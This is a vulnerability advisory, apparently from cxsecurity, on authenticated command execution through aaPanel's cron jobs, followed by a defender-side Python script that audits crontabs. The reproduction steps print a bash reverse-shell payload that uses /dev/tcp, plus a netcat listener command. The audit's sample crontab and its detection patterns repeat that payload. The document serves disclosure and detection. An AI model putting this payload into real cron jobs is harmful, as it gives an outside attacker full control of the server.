aaPanel 7.x.x Remote Command Execution
aaPanel 7.x.x contains a remote command execution vulnerability (CVSS score 9) that allows an attacker to inject and execute arbitrary commands by manipulating cron jobs, taking full control of the server. 2025-9-21 17:29:8 Author: cxsecurity.com (view original)

CVSS Base Score: 9/10

Impact Subscore: 10/10

Exploitability Subscore: 8/10

Exploit range: Remote

Attack complexity: Low

Authentication: Single time

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

This is authenticated RCE.

Vulnerability Description

During my testing/evaluation of aaPanel, I identified a flaw in how cron jobs are handled, which enables an attacker to inject and execute arbitrary commands remotely. Specifically:

- An authenticated user can manipulate cron job entries in a way that breaks out of the software to the server.
- This leads to the execution of malicious code on the server hosting aaPanel, potentially compromising the entire system.

Steps to Reproduce

1. Log in to the aaPanel dashboard.
2. Create a new cron job with the payload: bash -c "bash -i >& /dev/tcp/XXXX/1234 0>&1" (XXXX is your IP).
3. Save the cron job and trigger it (or wait for the scheduled execution). Start a listener on the other side to receive: nc -lvnp 1234
4. Observe the execution of the injected command on the server and RCE.

Many thanks,
Alasdair Gorniak/Hamed Kohi
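As an added defender-side example that is not part of the original advisory: a small Python audit of crontab text that flags scheduled commands shaped like the payload described above (interactive bash with stdio redirected to the /dev/tcp pseudo-device). The sample crontab, the command paths in it and the TEST-NET address are constructed for the example.

```python
import re
from dataclasses import dataclass

# Indicators derived from the payload shape in the advisory: an interactive
# bash whose stdin/stdout are redirected to bash's /dev/tcp pseudo-device.
REVERSE_SHELL_INDICATORS = (
    (re.compile(r"/dev/tcp/"), "uses bash /dev/tcp network pseudo-device"),
    (re.compile(r"\bbash\s+-i\b"), "spawns interactive bash from a scheduled job"),
    (re.compile(r">&\s*/dev/tcp/\S+\s+0>&1"), "redirects stdio to a socket"),
)
SCHEDULE_FIELDS = 5  # minute hour day-of-month month day-of-week
SPECIAL_SCHEDULE = re.compile(r"^@(reboot|yearly|annually|monthly|weekly|daily|hourly)\b")

@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list

def split_cron_line(line: str):
    """Return the command part of a crontab line, or None for comments,
    blank lines and VAR=value assignments."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", stripped):
        return None
    if SPECIAL_SCHEDULE.match(stripped):
        parts = stripped.split(None, 1)
        return parts[1] if len(parts) > 1 else ""
    parts = stripped.split(None, SCHEDULE_FIELDS)
    return parts[SCHEDULE_FIELDS] if len(parts) > SCHEDULE_FIELDS else ""

def audit_crontab(text: str) -> list:
    """Flag every cron command that matches at least one indicator."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        command = split_cron_line(line)
        if not command:
            continue
        reasons = [why for pattern, why in REVERSE_SHELL_INDICATORS if pattern.search(command)]
        if reasons:
            findings.append(Finding(no, command, reasons))
    return findings

# Constructed sample crontab: two benign jobs plus one entry shaped like the
# advisory's payload, pointing at a TEST-NET address rather than a real host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 2 * * * /usr/local/bin/rotate-backups --quiet
*/5 * * * * bash -c "bash -i >& /dev/tcp/192.0.2.10/1234 0>&1"
@daily /usr/local/bin/renew-certs
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.command}\n  " + "; ".join(f.reasons))
```

Run the audit over the crontab files aaPanel writes for the panel user as well as over the system crontab, since the advisory's vector is an entry created through the dashboard rather than one edited on the host directly.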

Source: https://cxsecurity.com/issue/WLB-2025090010